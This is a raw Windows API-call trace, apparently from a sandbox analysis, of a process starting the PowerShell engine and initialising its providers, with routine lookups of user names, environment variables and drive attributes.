	[0345.082] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1aca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0345.082] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1aca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0345.083] CoTaskMemAlloc (cb=0x804) returned 0x1b827950
	[0345.083] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b827950, nSize=0x1ad248 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1ad248) returned 0x1
	[0345.083] CoTaskMemFree (pv=0x1b827950) 
	[0345.083] CoTaskMemAlloc (cb=0x204) returned 0x414cc0
	[0345.083] GetUserNameW (in: lpBuffer=0x414cc0, pcbBuffer=0x1ad288 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1ad288) returned 1
	[0345.083] CoTaskMemFree (pv=0x414cc0) 
	[0345.083] ReportEventW (hEventLog=0x1b9d0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3292eb0*="Environment", lpRawData=0x3292c40) returned 1
	[0345.084] CoTaskMemAlloc (cb=0x104) returned 0x467e50
	[0345.084] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x467e50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0345.084] CoTaskMemFree (pv=0x467e50) 
	[0345.084] CoTaskMemAlloc (cb=0x104) returned 0x467e50
	[0345.084] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x467e50, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0345.084] CoTaskMemFree (pv=0x467e50) 
	[0345.084] CoTaskMemAlloc (cb=0x104) returned 0x467e50
	[0345.084] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x467e50, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0345.084] CoTaskMemFree (pv=0x467e50) 
	[0345.085] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x1acdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d
	[0345.085] SetErrorMode (uMode=0x1) returned 0x1
	[0345.085] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0x1ad000 | out: lpFileInformation=0x1ad000*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0345.085] SetErrorMode (uMode=0x1) returned 0x1
	[0345.086] GetLogicalDrives () returned 0x4
	[0345.086] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x1acb60, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0345.087] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0345.087] SetErrorMode (uMode=0x1) returned 0x1
	[0345.087] CoTaskMemAlloc (cb=0x68) returned 0x1b814dd0
	[0345.087] CoTaskMemAlloc (cb=0x68) returned 0x1b8147b0
	[0345.087] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1b814dd0, nVolumeNameSize=0x32, lpVolumeSerialNumber=0x1acfd0, lpMaximumComponentLength=0x1acfcc, lpFileSystemFlags=0x1acfc8, lpFileSystemNameBuffer=0x1b8147b0, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1acfd0*=0x9c354b42, lpMaximumComponentLength=0x1acfcc*=0xff, lpFileSystemFlags=0x1acfc8*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1
	[0345.087] CoTaskMemFree (pv=0x1b814dd0) 
	[0345.087] CoTaskMemFree (pv=0x1b8147b0) 
	[0345.088] SetErrorMode (uMode=0x1) returned 0x1
	[0345.088] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0345.088] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1acd10, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0345.088] SetErrorMode (uMode=0x1) returned 0x1
	[0345.088] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1acf70 | out: lpFileInformation=0x1acf70*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0345.088] SetErrorMode (uMode=0x1) returned 0x1
	[0345.088] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1acd10, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0345.089] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x1acbc0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0345.089] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0345.089] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x1acaf0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0345.089] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0345.089] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1acb40, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0345.089] SetErrorMode (uMode=0x1) returned 0x1
	[0345.090] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1acda0 | out: lpFileInformation=0x1acda0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0345.090] SetErrorMode (uMode=0x1) returned 0x1
	[0345.090] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1acb40, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0345.090] SetErrorMode (uMode=0x1) returned 0x1
	[0345.090] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1acda0 | out: lpFileInformation=0x1acda0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0345.090] SetErrorMode (uMode=0x1) returned 0x1
	[0345.090] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1acbe0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0345.090] SetErrorMode (uMode=0x1) returned 0x1
	[0345.090] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1ace40 | out: lpFileInformation=0x1ace40*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0345.090] SetErrorMode (uMode=0x1) returned 0x1
	[0345.091] CoTaskMemAlloc (cb=0x804) returned 0x1b827950
	[0345.091] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b827950, nSize=0x1ad248 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1ad248) returned 0x1
	[0345.091] CoTaskMemFree (pv=0x1b827950) 
	[0345.091] CoTaskMemAlloc (cb=0x204) returned 0x414cc0
	[0345.091] GetUserNameW (in: lpBuffer=0x414cc0, pcbBuffer=0x1ad288 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1ad288) returned 1
	[0345.091] CoTaskMemFree (pv=0x414cc0) 
	[0345.092] ReportEventW (hEventLog=0x1b9d0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3299fa0*="FileSystem", lpRawData=0x3299d30) returned 1
	[0345.092] CoTaskMemAlloc (cb=0x104) returned 0x467e50
	[0345.092] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x467e50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0345.092] CoTaskMemFree (pv=0x467e50) 
	[0345.092] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1acb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0345.093] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1aca70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0345.093] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1aca70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0345.093] CoTaskMemAlloc (cb=0x804) returned 0x1b827950
	[0345.093] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b827950, nSize=0x1ad248 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1ad248) returned 0x1
	[0345.093] CoTaskMemFree (pv=0x1b827950) 
	[0345.093] CoTaskMemAlloc (cb=0x204) returned 0x414cc0
	[0345.093] GetUserNameW (in: lpBuffer=0x414cc0, pcbBuffer=0x1ad288 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1ad288) returned 1
	[0345.094] CoTaskMemFree (pv=0x414cc0) 
	[0345.094] ReportEventW (hEventLog=0x1b9d0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x329f7e0*="Function", lpRawData=0x329f570) returned 1
	[0345.094] CoTaskMemAlloc (cb=0x104) returned 0x467e50
	[0345.094] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x467e50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0345.094] CoTaskMemFree (pv=0x467e50) 
	[0345.096] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1acaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0345.096] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1aca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0345.096] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1aca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0345.096] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1aca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0345.398] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1acaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0345.398] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1aca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0345.398] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1aca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0345.400] CoTaskMemAlloc (cb=0x804) returned 0x1b827950
	[0345.400] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b827950, nSize=0x1ad248 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1ad248) returned 0x1
	[0345.401] CoTaskMemFree (pv=0x1b827950) 
	[0345.401] CoTaskMemAlloc (cb=0x204) returned 0x414cc0
	[0345.401] GetUserNameW (in: lpBuffer=0x414cc0, pcbBuffer=0x1ad288 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1ad288) returned 1
	[0345.401] CoTaskMemFree (pv=0x414cc0) 
	[0345.401] ReportEventW (hEventLog=0x1b9d0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x32c2008*="Registry", lpRawData=0x32c1d98) returned 1
	[0345.638] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1acaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0345.638] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1aca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0345.638] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1aca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0345.638] CoTaskMemAlloc (cb=0x804) returned 0x1b827950
	[0345.639] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b827950, nSize=0x1ad248 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1ad248) returned 0x1
	[0345.639] CoTaskMemFree (pv=0x1b827950) 
	[0345.639] CoTaskMemAlloc (cb=0x204) returned 0x414cc0
	[0345.639] GetUserNameW (in: lpBuffer=0x414cc0, pcbBuffer=0x1ad288 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1ad288) returned 1
	[0345.639] CoTaskMemFree (pv=0x414cc0) 
	[0345.639] ReportEventW (hEventLog=0x1b9d0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x32c7420*="Variable", lpRawData=0x32c71b0) returned 1
	[0345.640] CoTaskMemAlloc (cb=0x104) returned 0x467e50
	[0345.640] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x467e50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0345.640] CoTaskMemFree (pv=0x467e50) 
	[0345.640] CoTaskMemAlloc (cb=0x104) returned 0x467e50
	[0345.640] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x467e50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0345.640] CoTaskMemFree (pv=0x467e50) 
	[0345.641] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1acaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0345.641] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1aca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0345.641] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1aca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0345.642] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1aca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0345.664] CoTaskMemAlloc (cb=0x804) returned 0x1b829950
	[0345.664] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b829950, nSize=0x1ad248 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1ad248) returned 0x1
	[0345.664] CoTaskMemFree (pv=0x1b829950) 
	[0345.664] CoTaskMemAlloc (cb=0x204) returned 0x414cc0
	[0345.664] GetUserNameW (in: lpBuffer=0x414cc0, pcbBuffer=0x1ad288 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1ad288) returned 1
	[0345.664] CoTaskMemFree (pv=0x414cc0) 
	[0345.665] ReportEventW (hEventLog=0x1b9d0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x32db038*="Certificate", lpRawData=0x32dadc8) returned 1
	[0345.670] CoTaskMemAlloc (cb=0x104) returned 0x467e50
	[0345.670] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x467e50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0345.670] CoTaskMemFree (pv=0x467e50) 
	[0345.673] GetLogicalDrives () returned 0x4
	[0345.673] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x1aced0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0345.674] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0345.675] CoTaskMemAlloc (cb=0x20e) returned 0x464280
	[0345.675] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x464280 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0345.675] CoTaskMemFree (pv=0x464280) 
	[0345.676] CoTaskMemAlloc (cb=0x104) returned 0x467e50
	[0345.676] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x467e50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0345.676] CoTaskMemFree (pv=0x467e50) 
	[0345.676] CoTaskMemAlloc (cb=0x104) returned 0x467e50
	[0345.676] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x467e50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0345.676] CoTaskMemFree (pv=0x467e50) 
	[0345.958] CoTaskMemAlloc (cb=0x104) returned 0x467e50
	[0345.958] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x467e50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0345.958] CoTaskMemFree (pv=0x467e50) 
	[0345.959] CoTaskMemAlloc (cb=0x104) returned 0x467e50
	[0345.959] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x467e50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0345.959] CoTaskMemFree (pv=0x467e50) 
	[0345.960] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1acc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0345.960] SetErrorMode (uMode=0x1) returned 0x1
	[0345.960] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1ace90 | out: lpFileInformation=0x1ace90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0345.960] SetErrorMode (uMode=0x1) returned 0x1
	[0345.960] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1acc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0345.960] SetErrorMode (uMode=0x1) returned 0x1
	[0345.960] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1ace90 | out: lpFileInformation=0x1ace90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0345.960] SetErrorMode (uMode=0x1) returned 0x1
	[0345.961] CoTaskMemAlloc (cb=0x104) returned 0x467e50
	[0345.961] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x467e50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0345.961] CoTaskMemFree (pv=0x467e50) 
	[0345.965] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1acdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0345.966] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1acc40, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0345.966] SetErrorMode (uMode=0x1) returned 0x1
	[0345.966] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1ace50 | out: lpFileInformation=0x1ace50*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0345.966] SetErrorMode (uMode=0x1) returned 0x1
	[0345.966] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1acc40, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0345.966] SetErrorMode (uMode=0x1) returned 0x1
	[0345.966] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1ace50 | out: lpFileInformation=0x1ace50*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0345.966] SetErrorMode (uMode=0x1) returned 0x1
	[0345.966] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1acc50, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0345.967] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x1acb40, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0345.967] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1acc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0345.967] SetErrorMode (uMode=0x1) returned 0x1
